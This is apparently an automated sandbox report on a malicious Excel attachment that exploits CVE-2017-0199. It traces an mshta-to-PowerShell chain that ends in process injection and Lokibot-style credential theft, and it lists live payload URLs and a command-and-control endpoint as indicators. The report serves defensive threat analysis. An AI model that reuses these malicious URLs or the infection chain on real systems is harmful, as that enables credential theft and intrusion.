        File and Directory Discovery
        Remote Services1
        Browser Session Hijacking
        5
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts121
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        211
        Process Injection
        11
        Obfuscated Files or Information
        1
        Credentials in Registry
        14
        System Information Discovery
        Remote Desktop Protocol2
        Data from Local System
        1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts4
        PowerShell
        Logon Script (Windows)Logon Script (Windows)1
        Install Root Certificate
        Security Account Manager1
        Security Software Discovery
        SMB/Windows Admin Shares11
        Email Collection
        4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading
        NTDS1
        Process Discovery
        Distributed Component Object Model1
        Clipboard Data
        15
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets21
        Virtualization/Sandbox Evasion
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Application Window Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
        Process Injection
        DCSync1
        Remote System Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1540834 Sample: Shipping Documents WMLREF11... Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 95 Suricata IDS alerts for network traffic 2->95 97 Malicious sample detected (through community Yara rule) 2->97 99 Multi AV Scanner detection for submitted file 2->99 101 16 other signatures 2->101 11 EXCEL.EXE 57 29 2->11         started        process3 dnsIp4 87 192.3.176.141, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 11->87 89 mpa.li 5.159.62.244, 443, 49163, 49170 TLN-ASDE Germany 11->89 69 Shipping Documents...EF115900.xls (copy), Composite 11->69 dropped 71 seethebestthingsto...febestthigns[1].hta, HTML 11->71 dropped 133 Microsoft Office drops suspicious files 11->133 16 mshta.exe 10 11->16         started        20 mshta.exe 10 11->20         started        file5 signatures6 process7 dnsIp8 73 5.159.62.243, 443, 49165, 49172 TLN-ASDE Germany 16->73 75 mpa.li 16->75 91 Suspicious powershell command line found 16->91 93 PowerShell case anomaly found 16->93 22 powershell.exe 24 16->22         started        77 mpa.li 20->77 26 powershell.exe 20->26         started        signatures9 process10 file11 65 goodthingswithgrea...ckwithgreatthig.vbS, Unicode 22->65 dropped 67 C:\Users\user\AppData\...\41k31je4.cmdline, Unicode 22->67 dropped 107 Suspicious powershell command line found 22->107 109 Obfuscated command line found 22->109 28 wscript.exe 1 22->28         started        31 powershell.exe 4 22->31         started        33 csc.exe 2 22->33         started        36 wscript.exe 26->36         started        38 csc.exe 26->38         started        40 powershell.exe 26->40         started        signatures12 process13 file14 123 Suspicious powershell command line found 28->123 125 Wscript starts Powershell (via cmd or directly) 28->125 127 Bypasses PowerShell execution policy 28->127 131 2 other signatures 28->131 42 powershell.exe 2 28->42         started        129 Installs new ROOT certificates 31->129 61 C:\Users\user\AppData\Local\...\41k31je4.dll, PE32 33->61 dropped 45 cvtres.exe 33->45         started        47 powershell.exe 36->47         started        63 C:\Users\user\AppData\Local\...\sblybu2m.dll, PE32 38->63 dropped 49 cvtres.exe 38->49         started        signatures15 process16 signatures17 111 Suspicious powershell command line found 42->111 113 Obfuscated command line found 42->113 51 powershell.exe 12 4 42->51         started        55 powershell.exe 47->55         started        process18 dnsIp19 79 drive.usercontent.google.com 142.250.186.97, 443, 49169, 49176 GOOGLEUS United States 51->79 81 drive.google.com 216.58.212.174, 443, 49168 GOOGLEUS United States 51->81 103 Writes to foreign memory regions 51->103 105 Injects a PE file into a foreign processes 51->105 57 AddInProcess32.exe 51->57         started        83 142.250.186.142, 443, 49175 GOOGLEUS United States 55->83 signatures20 process21 dnsIp22 85 94.156.177.220, 49178, 49179, 49180 NET1-ASBG Bulgaria 57->85 115 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 57->115 117 Tries to steal Mail credentials (via file / registry access) 57->117 119 Tries to harvest and steal ftp login credentials 57->119 121 Tries to harvest and steal browser information (history, passwords, etc) 57->121 signatures23

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Shipping Documents WMLREF115900.xls25%VirustotalBrowse
        Shipping Documents WMLREF115900.xls21%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
        Shipping Documents WMLREF115900.xls100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://crl.entrust.net/server1.crl00%URL Reputationsafe
        http://ocsp.entrust.net030%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        http://go.micros0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        http://ocsp.entrust.net0D0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://secure.comodo.com/CPS00%URL Reputationsafe
        http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        216.58.212.174
        truefalse
          unknown
          drive.usercontent.google.com
          142.250.186.97
          truefalse
            unknown
            mpa.li
            5.159.62.244
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://192.3.176.141/36/LOGS%20LOKI.txttrue
                unknown
                http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htatrue
                  unknown
                  https://mpa.li/uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&characterfalse
                    unknown
                    http://94.156.177.220/logs/five/fre.phptrue
                      unknown
                      http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFtrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.442283646.000000000238B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.445318910.00000000121B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://mpa.li/3mshta.exe, 00000004.00000002.417853358.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415217426.0000000002B9A000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://mpa.li/mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467916153.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465640922.000000000335C000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://192.3.176.141/mshta.exe, 0000000F.00000002.467980452.00000000033D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.00000000033D2000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://ocsp.entrust.net03mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFe089Qpowershell.exe, 00000011.00000002.486368621.000000001AAF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaicialmshta.exe, 0000000F.00000003.455711004.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaPmshta.exe, 0000000F.00000003.461799715.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.0000000000505000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.445318910.00000000121B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://mpa.li/~mshta.exe, 00000004.00000003.415290923.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415580247.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.445318910.00000000121B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta...mshta.exe, 0000000F.00000002.467916153.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465640922.000000000335C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaLKWWSmshta.exe, 0000000F.00000002.468383911.0000000004710000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFppowershell.exe, 00000005.00000002.442283646.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.481877021.0000000002687000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              http://192.3.176.141/a.limshta.exe, 0000000F.00000002.467980452.00000000033D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.00000000033D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://go.microspowershell.exe, 00000005.00000002.442283646.0000000002FDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta...al=quimshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFe089powershell.exe, 00000005.00000002.445624079.000000001A933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://192.3.176.141/Pmshta.exe, 00000004.00000002.417853358.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415217426.0000000002BA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://mpa.li/uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&displaymshta.exe, 00000004.00000003.415290923.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415290923.000000000051E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415580247.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.000000000054F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.000000000054F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.0000000000565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.00000000004EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Shipping Documents WMLREF115900.xls, A4230000.0.drfalse
                                                        unknown
                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaEMmshta.exe, 00000004.00000003.415290923.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415580247.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htahttp://192.3.176.141/36/mshta.exe, 00000004.00000003.415792873.0000000002015000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461896844.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461439438.0000000002DA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaumshta.exe, 0000000F.00000002.467916153.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465640922.000000000335C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://mpa.li/bmshta.exe, 00000004.00000003.415290923.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415580247.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://contoso.com/powershell.exe, 00000005.00000002.445318910.00000000121B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.442283646.000000000238B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.445318910.00000000121B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://mpa.li/(mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://drive.google.compowershell.exe, 0000000E.00000002.493475801.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.525200157.0000000002632000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      unknown
                                                                      https://drive.usercontent.google.compowershell.exe, 0000000E.00000002.493475801.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.525200157.0000000002802000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaC:mshta.exe, 0000000F.00000002.467916153.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465640922.000000000335C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htacepC:mshta.exe, 00000004.00000002.417853358.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415217426.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://192.3.176.141/dmshta.exe, 00000004.00000002.417853358.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415217426.0000000002BA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.442283646.0000000002181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.493475801.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.481877021.00000000020F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.525200157.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.493058741.000000000229F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta;mshta.exe, 0000000F.00000003.461799715.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://go.crpowershell.exe, 00000005.00000002.445947202.000000001C85E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://192.3.176.141/36/goodthinpowershell.exe, 00000005.00000002.442283646.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.481877021.0000000002687000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    192.3.176.141
                                                                                    unknownUnited States
                                                                                    36352AS-COLOCROSSINGUStrue
                                                                                    5.159.62.244
                                                                                    mpa.liGermany
                                                                                    59507TLN-ASDEfalse
                                                                                    5.159.62.243
                                                                                    unknownGermany
                                                                                    59507TLN-ASDEfalse
                                                                                    94.156.177.220
                                                                                    unknownBulgaria
                                                                                    43561NET1-ASBGtrue
                                                                                    142.250.186.142
                                                                                    unknownUnited States
                                                                                    15169GOOGLEUSfalse
                                                                                    216.58.212.174
                                                                                    drive.google.comUnited States
                                                                                    15169GOOGLEUSfalse
                                                                                    142.250.186.97
                                                                                    drive.usercontent.google.comUnited States
                                                                                    15169GOOGLEUSfalse
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1540834
                                                                                    Start date and time:2024-10-24 08:44:07 +02:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 7m 18s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                    Number of analysed new started processes analysed:30
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • GSI enabled (VBA)
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Sample name:Shipping Documents WMLREF115900.xls
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.expl.evad.winXLS@34/43@9/7
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 33.3%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 11
                                                                                    • Number of non-executed functions: 0
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .xls
                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                    • Attach to Office via COM
                                                                                    • Active ActiveX Object
                                                                                    • Active ActiveX Object
                                                                                    • Scroll down
                                                                                    • Close Viewer
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                                    • Execution Graph export aborted for target mshta.exe, PID 2600 because there are no executed function
                                                                                    • Execution Graph export aborted for target mshta.exe, PID 3484 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    TimeTypeDescription
                                                                                    02:45:23API Interceptor113x Sleep call for process: mshta.exe modified
                                                                                    02:45:27API Interceptor863x Sleep call for process: powershell.exe modified
                                                                                    02:45:36API Interceptor13x Sleep call for process: wscript.exe modified
                                                                                    02:46:05API Interceptor452x Sleep call for process: AddInProcess32.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    192.3.176.141Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                    • 192.3.176.141/43/LCRDDFR.txt
                                                                                    logicalwayofgreatthingswhichcreatedwithgreatwayofgood.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                    • 192.3.176.141/43/newthingswithgreatfturuewithgreatdaywellbetterforme.tIF
                                                                                    greatwayforbestthignswithwhonotwanttodo.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                    • 192.3.176.141/42/simplethingswithgreatfuturebetteronegetbackforme.tIF
                                                                                    PPM435679.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 192.3.176.141/551/cw/nicevisionnicemagicalthinsforentirelifetogetmebackwithgreat.hta
                                                                                    Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 192.3.176.141/550/cw/fullofconfidentwithgreatnicethingswedonewithgreatattitude.hta
                                                                                    Payment Advice080.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 192.3.176.141/456/cs/verynicesweetgirlsareeverywheretogetmein.hta
                                                                                    Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 192.3.176.141/455/ed/createnewthingswithmygrilstobeinline.hta
                                                                                    Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 192.3.176.141/233/cbn/nicegirlwithgreatthingonthisdealingfgood.hta
                                                                                    Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 192.3.176.141/233/cbn/nicegirlwithgreatthingonthisdealingfgood.hta
                                                                                    Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 192.3.176.141/233/cbn/nicegirlwithgreatthingonthisdealingfgood.hta
                                                                                    94.156.177.220Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.220/logs/five/fre.php
                                                                                    SOA October 24_1.docGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.220/skipo/five/fre.php
                                                                                    17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.220/logs/five/fre.php
                                                                                    New Order.exeGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.220/skipo/five/fre.php
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    AS-COLOCROSSINGUSA & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 192.210.215.8
                                                                                    #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                    • 104.168.7.51
                                                                                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                    • 192.3.165.37
                                                                                    la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                    • 107.175.231.193
                                                                                    Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                    • 192.3.176.141
                                                                                    PRODUCT_INQUIRY.jsGet hashmaliciousWSHRatBrowse
                                                                                    • 192.210.215.11
                                                                                    Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 107.175.229.138
                                                                                    InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
